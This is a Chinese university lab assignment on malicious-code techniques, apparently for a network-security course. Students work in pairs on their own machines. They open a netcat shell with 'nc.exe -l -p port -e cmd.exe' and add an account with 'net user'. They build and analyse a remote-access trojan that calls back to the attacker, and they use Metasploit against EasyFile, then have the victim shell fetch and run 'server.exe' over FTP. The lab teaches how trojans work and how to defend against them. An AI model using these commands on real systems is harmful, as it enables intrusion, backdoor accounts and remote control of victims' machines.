實驗四之惡意程式碼技術
------------恢復內容開始------------
中國人民公安大學
Chinese people’ public security university
網路對抗技術
實驗報告
實驗四
惡意程式碼技術
學生姓名 王子琦
年級 2018
區隊 網安六區
指導教師 高見
資訊科技與網路安全學院
2016年11月7日
實驗任務總綱
2016—2017 學年 第 一 學期
一、實驗目的
1.通過對木馬的練習,使讀者理解和掌握木馬傳播和執行的機制;通過手動刪除木馬,掌握檢查木馬和刪除木馬的技巧,學會防禦木馬的相關知識,加深對木馬的安全防範意識。
2.瞭解並熟悉常用的網路攻擊工具,木馬的基本功能;
3.達到鞏固課程知識和實際應用的目的。
二、實驗要求
1.認真閱讀每個實驗內容,需要截圖的題目,需清晰截圖並對截圖進行標註和說明。
2.文件要求結構清晰,圖文表達準確,標註規範。推理內容客觀、合理、邏輯性強。
3.軟體工具可使用NC、MSF等。
4.實驗結束後,保留電子文件。
三、實驗步驟
1.準備
提前做好實驗準備,實驗前應把詳細瞭解實驗目的、實驗要求和實驗內容,熟悉並準備好實驗用的軟體工具,按照實驗內容和要求提前做好實驗內容的準備。
2.實驗環境
描述實驗所使用的硬體和軟體環境(包括各種軟體工具);
開機並啟動軟體office2003或2007、瀏覽器、加解密軟體。
3.實驗過程
1)啟動系統和啟動工具軟體環境。
2)用軟體工具實現實驗內容。
4.實驗報告
按照統一要求的實驗報告格式書寫實驗報告。把按照模板格式編寫的文件嵌入到實驗報告文件中,文件按照規定的書寫格式書寫,表格要有表說圖形要有圖說。
任務一 利用NC控制電腦
NetCat,具有網路軍刀之稱,它小巧精悍且功能強大,說它小巧精悍,是因為他的軟體大小現在已經壓縮到只有十幾KB,而且在功能上絲毫不減。
實驗過程需要兩個同學相互配合完成:
步驟一:
在受害者的機器 (同學A)
輸入下面的命令:
nc.exe -l -p port -e cmd.exe 進入監聽模式
步驟二:
在攻擊者的機器.(同學B)
輸入下面的命令:
nc ip port //連線victim_IP,然後得到一個shell。 (需要截圖)
步驟三:
在shell中,利用net user 使用者名稱 密碼 /add ,新增一個使用者,並在受害者的機器中使用 net user 命令進行驗證。(需要截圖)
可以繼續通過命令列做一些事情。
任務二 利用木馬控制電腦
相關工具:
https://pan.baidu.com/s/1ipOkdU2HTPFtgU6fF669Gg
https://pan.baidu.com/s/1ajmRKsnv5XvFrKWzszDYwQ(備用,另外一個木馬)
實驗過程需要兩個同學配合:
步驟一:
攻擊者的機器. (同學A)
開啟V2014.exe程式或則star RAT,這兩個木馬功能類似。
步驟二:
點選選單欄中的“服務生成”,在彈出的配置服務端中,配置回連IP地址(攻擊者IP)和埠號,並點選“生成”按鈕,生成木馬服務端。
步驟三:
將生成的木馬可執行程式拷貝到受害者的機器,並雙擊執行。
步驟四:
在控制端中檢視木馬上線情況,並對以下功能每個進行測試和截圖。 【部分功能可能會無效,可以不用截圖】
-
檔案管理,嘗試拷貝檔案
-
螢幕控制,嘗試獲取桌面
-
鍵盤記錄,嘗試獲取對方擊鍵記錄
-
會話管理,重啟對方機器,檢視是否能自啟動上線
會話管理,解除安裝對方的木馬。
任務三 木馬分析
1.將任務二中生成的木馬設定具備自刪除功能和自啟動功能,對其進行分析。回答以下問題(截圖證明)
(推薦使用“火絨劍”工具)
1.
該木馬的回連IP是?
該木馬的回連埠是?
該木馬自刪除後,會將自身的宿主程式改成什麼名字,並隱藏到系統其它目錄中。
該木馬依靠什麼方法實現自啟動的,怎麼實現的。
任務四 msf攻擊體驗
1.在主機A上搭建easyfile,安裝檔案為efssetup,請見線上學習平臺。
2.在主機B上安裝metasploitframework,並在安裝目錄中啟動/bin下的msfconsole
3.進入msf命令列後使用search命令查詢相關模組,use 載入模組,show options 檢視引數。
4.把遠端目標引數rhosts設定為主機A的IP地址,開始攻擊。
5.進入到meterpreter> 命令列下,說明已經獲取到shell,可以使用sysinfo檢視目標系統的資訊,screenshot截圖。
下面的步驟是進一步控制目標機器,上傳木馬。
1.在B機器上搭建ftp,設定使用者名稱和密碼。
2.在B機器開啟木馬控制端,生成木馬server.exe,並放置在ftp目錄下。
3.在meterpreter>命令列下輸入shell ,進入被控機器的shell
4.用被控機器的shell登入B機器的ftp,下載並執行木馬。檢視木馬上線。
涉及到的ftp命令有:
ftp 192.168.31.100 登入
get server.exe 下載檔案
------------恢復內容結束------------